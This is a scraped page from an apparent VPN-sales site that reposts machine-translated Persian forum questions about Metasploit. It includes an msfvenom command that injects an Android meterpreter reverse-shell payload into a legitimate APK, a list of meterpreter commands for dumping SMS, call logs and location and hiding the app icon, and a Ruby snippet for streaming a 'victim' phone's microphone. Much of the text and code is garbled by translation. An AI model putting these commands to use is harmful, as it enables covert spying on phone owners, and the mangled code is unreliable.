metasploit – برگه 2 – کلیک کنید: خرید VPN خرید وی پی ان خرید فیلتر شکن خرید فیلترشکن

جولای 24, 2018

چطور می توانم یک مزرعه مانند Metasploit ایجاد کنم؟

اگر من بخواهم چارچوب را از صفر شبیه به metasploit (تعبیه شده در کالی) و قابلیت آن، چارچوب خواندن یا مهارت یاد بگیرم تا آن را بنویسم

جولای 18, 2018

metasploit meterpreter اندروید Infect apk کار نمی کند؟

من reprecedented_tcp را ایجاد کرده ام و با APK دیگر با این اسکریپت تزریق کردم

msfvenom -x path / to / original.apk -p android / meterpreter / reverse_tcp
LHOST = MyIP LPORT = MyPORT -o /path/to/result_infect.apk

پس من آن را بر روی دستگاهم اجرا میکنم، آن را اجرا میکنم

و مترتیمتر فعال هستم

اما مسئله

من میتوانم ' T استفاده از تمام عملکرد مترpreter. مانند dump_sms، dump_calllog یا webcam_steam.

  شرح فرمان
    ------- -----------
    activity_start یک فعالیت Android را از یک رشته اری شروع کنید
    check_root بررسی کنید که آیا دستگاه ریشه دارد
    dump_calllog دریافت تماس ورود
    dump_contacts لیست مخاطبین را دریافت کنید
    dump_sms دریافت پیام های اس ام اس
    geolocate با استفاده از موقعیت جغرافیایی، با استفاده از موقعیت جغرافیایی فعلی به طول انجامید
    hide_app_icon پنهان کردن نماد برنامه از پرتاب
    interval_collect توانایی جمع آوری فاصله را مدیریت کنید
    send_sms SMS از جلسه هدف ارسال می کند
    set_audio_mode تنظیم حالت زنگ
    sqlite_query پرس و جو از پایگاه داده SQLite از ذخیره سازی
    wakelock فعال کردن / غیر فعال کردن Wakelock
    wlan_geolocate با استفاده از اطلاعات WLAN، از طريق لاتين فعلي استفاده کنيد

meterpreter> check_root
[*] دستگاه ریشه ندارد
مترجم متن> dump_sms
[-] android_dump_sms: عملیات خراب شد: 1 مترpreter> dump_calllog
[-] android_dump_calllog: عملیات انجام نشد: 1

و غیره

چگونه می توانم این را حل کنم، سعی میکنم به دستگاه اندرویدی دیگر بپردازم و کار هم نکنم.

توجه: من مترتبکر (original.apk) را ایجاد کرده ام و به عنوان یک جذابیت کار میکنم، یا اجرای ضربه محکم و ناگهانی وب کم چرا این کار بر روی injected.apk اجرا نمی شود؟

با تشکر از شما.

ژوئن 9, 2018

هک نسخه ی نمایشی (با صدای بلند همسایه خراب)

ژوئن 7, 2018

اندروید – نحوه پخش صوت از تلفن قربانی با اسکریپت metasploit ruby

من می خواهم جریان صوتی میکروفون را در metasploit مانند webcam_stream ایجاد کنم، بنابراین برخی از کدها را به اسکریپت ruby اضافه کردم: (/ usr / share / metasploit-framework / lib / rex / post / meterpreter / ui / console / command_dispatcher / stdapi / webcam.rb )، قطعه کد اضافه شده است:

 def cmd_mic_stream (* args)

print_status ("شروع ...")
stream_path = Rex :: Text.rand_text_alpha (8) + ".wav"
player_path = Rex :: Text.rand_text_alpha (8) + ".html"
مدت زمان = 2
view = true
وقفه = 1800

record_mic_opts = Rex :: Parser :: Arguments.new (
  "-h" => [ false, "Help Banner" ]
  "-d" => [ true, "The stream duration in seconds (Default:2)" ]، # 1/30 دقیقه
  "-s" => [ true, "The stream file path (Default: '#{stream_path}')" ]
  "-t" => [ true, "The stream player path (Default: #{player_path})"]
  "-v" => [ true, "Automatically view the stream (Default: '#{view}')" ]
)

 record_mic_opts.parse (args) انجام دهید، _idx، val |
  انتخاب مورد
  وقتی "-h"
    print_line ("استفاده: record_mic [options]  n")
    print_line ("ضبط صدا از پیش فرض میکروفون")
    print_line (record_mic_opts.usage)
    برگشت
  وقتی "-d"
    مدت زمان = val.to_i
  وقتی "-s"
    stream_path = val
  وقتی "-t"
    player_path = val
  وقتی "-v"
    نمایش = true اگر val = ~ / ^ (f | n | 0) / i
  پایان
پایان

print_status ("آماده سازی بازیکن ...")
<! -
    html =٪ | 



 Metasploit webcam_stream - # {client.sock.peerhost} 




 هدف IP: # {client.sock.peerhost}
زمان شروع: # {Time.now}
وضعیت: 


 
 www.metasploit.com 





     |

->
:: فایل.open (player_path، 'wb') do | f |

  f.write (html)

پایان

اگر دید

  print_status ("باز کردن بازیکن در: # {player_path}")

  Rex :: Compat.open_file (player_path)

چیز دیگری

  print_status ("لطفا به صورت دستی با مرورگر باز شود: # {player_path}")

پایان
print_status ("جریان ...")

شروع

  :: Timeout.timeout (timeout) انجام دهید

    در حالی که مشتری انجام می دهد

      data = client.webcam.record_mic (مدت زمان)

      اگر داده

         :: فایل.open (stream_path، 'wb') do | d |

         d.write (داده ها)

        پایان

        داده ها = nil

        خواب (5)

      پایان

    پایان

  پایان

نجات :: زمان بندی :: خطا

پایان
print_status ("متوقف شد")

پایان


 شما ممکن است متوجه شوید که آن را به فرمان webcam_stream شبیه است، مشکل اینجاست که مرورگر باز می شود، وضعیت خروجی «پخش» می شود، اما صوتی چیزی را بازی نمی کند، فقط چیزی که ممکن است باعث آن شود خالی است؟

ژوئن 1, 2018

metasploit – Handler موفق به اتصال به IP: پورت (پورت من باز است)

من سعی کردم تا برخی از آزمایش های اتصال را با metasploit من در شبکه خارجی انجام دهم، اما من نمی توانم به آن وصل، حتی اگر پورت من باز است.

تست پورت

تست بندر

اما زمانی که من سعی کنید اتصال برقرار کنید تا با ip و port من ارتباط برقرار کنید اما metasploit نمیتواند به آن گوش دهد

توضیح تصویر را اینجا وارد کنید

برای شما که میتواند به من کمک کند، بسیار سپاسگزار خواهم شد